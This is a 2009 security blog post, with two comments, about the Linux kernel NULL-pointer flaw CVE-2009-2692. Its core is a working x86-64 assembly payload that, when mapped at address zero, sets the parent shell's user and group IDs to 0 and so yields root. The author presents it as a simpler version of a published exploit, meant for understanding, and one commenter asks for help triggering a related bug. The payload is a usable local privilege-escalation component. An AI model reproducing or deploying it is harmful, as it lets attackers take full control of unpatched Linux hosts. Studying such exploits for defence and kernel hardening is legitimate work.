Friday, August 14, 2009

A .note on CVE-2009-2692

I recommend reading this posting.

I am usually not commenting on other ppl's bug-findings. 100% of the fame and honor should
go to Tavis Ormandy and Julien Tinnes. If spenders exploit is doing too much magic for you,
heres the simple code snippet, which, if mapped at 0x0 gives you root:

// threadinfo = $0xffffffffffffe000 & %rsp
// task_struct offsets: current->parent = 696 current->uid = 1080
void do_root_2_6_27_x8664()
{
__asm__(""
"xor %rax,%rax\n"
"mov $0xffffffffffffe000,%rax\n" /* find threadinfo */
"and %rsp,%rax\n"
"mov (%rax),%rax\n" /* threadinfo->task */
"mov 696(%rax),%rax\n" /* task->parent */
"movl $0,1080(%rax)\n" /* task->uid = 0 */
"movl $0,1084(%rax)\n" /* task->euid = 0 */
"movl $0,1088(%rax)\n" /* task->suid = 0 */
"movl $0,1092(%rax)\n" /* task->fsuid = 0 */
"movl $0,1096(%rax)\n" /* task->gid = 0 */
"movl $0,1100(%rax)\n" /* task->egid = 0 */
"leaveq\n");
}

It doesn't disable SELinux or so, its just for understanding that for simple rootshell you only
need to give the parent of the exploit (which is usually the shell that started the exploit)
UID/EUID of 0. The code is a modification of shellcode I used in a bluetooth kernel
PoC exploit 4 years or so ago.The code will cause a segfault
to the current process which does not matter since we
only care about the parent shell which obtains its root privs.

So, how much magic is there with the exploit?

Greetings to the people at HAR, I am sad I cannot attend this time :(

2 comments:

Anonymous said...

quite a bit of magic ;)

-spender

Anonymous said...

http://www.doecirc.energy.gov/bulletins/t-217.shtml
can u explain how to trigger that vuln coz i cant fully understand it
thanks :)